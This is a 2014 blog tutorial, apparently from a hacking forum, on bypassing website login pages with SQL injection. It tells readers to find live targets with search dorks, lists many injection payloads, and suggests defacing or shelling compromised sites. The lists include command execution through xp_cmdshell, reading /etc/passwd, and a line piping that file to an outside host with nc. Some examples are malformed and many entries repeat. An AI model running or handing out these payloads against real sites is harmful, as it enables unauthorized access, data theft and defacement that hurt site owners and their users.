Friday 29 August 2014

BASIC SQL INJECTION WITH LOGIN QUERIES



 

login2


Alright in this tutorial, we'll be learning how to bypass login pages with the help of My Sequel injection using Login Queries. 


 

What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:


 

Code:

Username: admin
Password: ‘ or ‘1’=’1


 

When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query


 

PHP Code:


SELECT FROM users
WHERE username ‘admin’AND password ‘ ‘ or ‘1’=’1’ 



 

In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect. 
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we 


 

Step1: Finding websites with Login Pages
Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
In this tutorial, we can use these dorks:


 

Code:

inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html


 

If you want to find more dorks when using this method, you can find them in google:


 



Step2: Now Executing the query


 

Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases


 

Code:

Username: admin
Password: ' or 0=0 --


 

Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.


 

Code:



  • ' or '1'='1

  • ' or 'x'='x

  • ' or 0=0 --

  • " or 0=0 --

  • or 0=0 --

  • ' or 0=0 #

  • " or 0=0 #

  • or 0=0 #

  • ' or 'x'='x

  • " or "x"="x

  • ') or ('x'='x

  • ' or 1=1--

  • " or 1=1--

  • or 1=1--

  • ' or a=a--

  • " or "a"="a

  • ') or ('a'='a

  • ") or ("a"="a

  • hi" or "a"="a

  • hi" or 1=1 --

  • hi' or 1=1 --

  • 'or'1=1'

  • ==

  • and 1=1--

  • and 1=1

  • ' or 'one'='one--

  • ' or 'one'='one

  • ' and 'one'='one

  • ' and 'one'='one--

  • 1') and '1'='1--

  • admin' --

  • admin' #

  • admin'/*

  • or 1=1--

  • or 1=1#

  • or 1=1/*

  • ) or '1'='1--

  • ) or ('1'='1--

  • ' or '1'='1

  • ' or 'x'='x

  • ' or 0=0 --

  • " or 0=0 --

  • or 0=0 --

  • ' or 0=0 #

  • " or 0=0 #

  • or 0=0 #

  • ' or 'x'='x

  • " or "x"="x

  • ') or ('x'='x

  • ' or 1=1--

  • " or 1=1--

  • or 1=1--

  • ' or a=a--

  • " or "a"="a

  • ') or ('a'='a

  • ") or ("a"="a

  • hi" or "a"="a

  • hi" or 1=1 --

  • hi' or 1=1 --

  • 'or'1=1'




 


Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.


 

Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website


 


 

Extras:
Common Password Queries:


 

Code:



  • admin' --

  • admin' #

  • admin'/*

  • ' or 1=1--

  • ' or 1=1#

  • ' or 1=1/*

  • ') or '1'='1--

  • ') or ('1'='1--




 


If version of Database is greater than 5, then queries with UNION,group, @@version,orderby,benchmark etc can be executed


 

Code:



  • 1234' AND 1=0 UNION ALL SELECT 'admin'

  • ' HAVING 1=1 --

  • ' GROUP BY table.columnfromerror1 HAVING 1=1 --

  • @@version

  • select @@version

  • select @@servername

  • select @@microsoftversion

  • select * from master..sysservers

  • select * from sysusers

  • exec master..xp_cmdshell 'ipconfig+/all'

  • exec master..xp_cmdshell 'net+view'

  • exec master..xp_cmdshell 'net+users'

  • SELECT 1 -- comment

  • SELECT /*comment*/1

  • ORDER BY 1--

  • ' union all select sum(columntofind) from users--

  • UNION ALL SELECT null

  • SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

  • SELECT TOP n columns

  • select * from OPENROWSET('MSDASQL'

  • select * from OPENROWSET('SQLOLEDB'

  • masters..sysxlogins

  • sys.sql_logins

  • SELECT/*avoid-spaces*/password/**/FROM/**/Members

  • SELECT CHAR(0x66)

  • SELECT * FROM members

  • @@version

  • SELECT USER();

  • select host

  • SELECT 1;

  • SELECT /*comment*/1;

  • ORDER BY 1--

  • UNION ALL SELECT null

  • SELECT schema_name FROM information_schema.schemata;

  • SELECT table_schema

  • SELECT grantee

  • limit 1

  • SELECT host

  • IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100

  • select benchmark( 500

  • SELECT CHAR(75)+CHAR(76)+CHAR(77)

  • SELECT ascii('A')

  • SELECT CONCAT('0x'

  • SELECT/*avoid-spaces*/password/**/FROM/**/Members

  • SELECT /*!32302 1/0

  • SELECT 0x5045

  • SELECT cast('1' AS unsigned integer);

  • SELECT cast('123' AS char);

  • SELECT IF(1=1

  • ' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a

  • union SELECT LOAD_FILE(0x2f6574632f706173737764)

  • load data infile 'c:/boot.ini' into table foo;

  • # SELECT ... INTO DUMPFILE

  • SELECT login || '-' || password FROM members

  • select versionnumber

  • select user from sysibm.sysdummy1;

  • select session_user from sysibm.sysdummy1;

  • select system_user from sysibm.sysdummy1;

  • select * from syscat.tabauth;

  • select current server from sysibm.sysdummy1;

  • select * from syscat.dbauth where grantee = current user;

  • select * from syscat.tdbauth where grantee = current user;

  • select name from sysibm.systables;

  • select name

  • SELECT schemaname FROM syscat.schemata;

  • SELECT foo FROM bar fetch first 1 rows only;

  • select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

  • select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;

  • SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;

  • SELECT cast(’123' as integer) FROM sysibm.sysdummy1;

  • select version();

  • select current_database();

  • "select current_user;

  • select session_user;

  • "SELECT current_setting('data_directory');

  • select current_setting(’log_connections’);

  • select current_setting(’log_statement’);

  • "select current_setting(’port’);

  • select current_setting(’password_encryption’);

  • select current_setting(’krb_server_keyfile’);

  • "select current_setting(’virtual_host’);

  • select current_setting(’port’);

  • "select current_setting(’config_file’);

  • "select current_setting(’hba_file’);

  • "select current_setting(’data_directory’);

  • LIMIT n

  • SELECT pg_sleep(10);

  • SELECT current_database()

  • SELECT relname

  • SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'

  • SELECT DISTINCT relname FROM pg_class C

  • SELECT 1; --comment

  • SELECT /*comment*/1;

  • SELECT chr(65);

  • SELECT ascii('A');

  • SELECT CHR(65)||CHR(66);

  • SELECT usename

  • SELECT usename FROM pg_user WHERE usesuper IS TRUE

  • SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');

  • SELECT 'A' || 'B';

  • SELECT CAST(1 as varchar);

  • SELECT CAST('1' as int);

  • SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'

  • select dbmsinfo(’_version’);

  • select dbmsinfo(’session_user’);

  • select dbmsinfo(’system_user’);

  • select dbmsinfo(’database’);

  • select dbmsinfo(’db_admin’);

  • select dbmsinfo(’create_table’);

  • select dbmsinfo(’create_procedure’);

  • select dbmsinfo(’security_priv’);

  • select dbmsinfo(’select_syscat’);

  • select dbmsinfo(’db_privileges’);

  • select dbmsinfo(’current_priv_mask’);

  • select top 10 blah from table;

  • select first 10 blah form table;

  • select table_name

  • select relid

  • select relid

  • select column_name

  • select 1 union select 2;

  • select cast(’123' as integer);

  • select @@version"

  • select name from master..syslogins"

  • select name from master..sysdatabases"

  • convert(integer

  • waitfor delay '0:0:5'




 


Database Version lower than 5 i.e Version 4 cannot accept UNION version 5 type queries.


 

I tried injecting many of them and it worked, so it should work for you too 
Good luck


 


 

Note:



All information on this forum is for educational purposes only.


 WE are not responsible for any attacks that are carried out on networks, websites or servers.




 
Posted by Pak Defndr at 12:07
Labels: , , ,

0 comments:

Post a Comment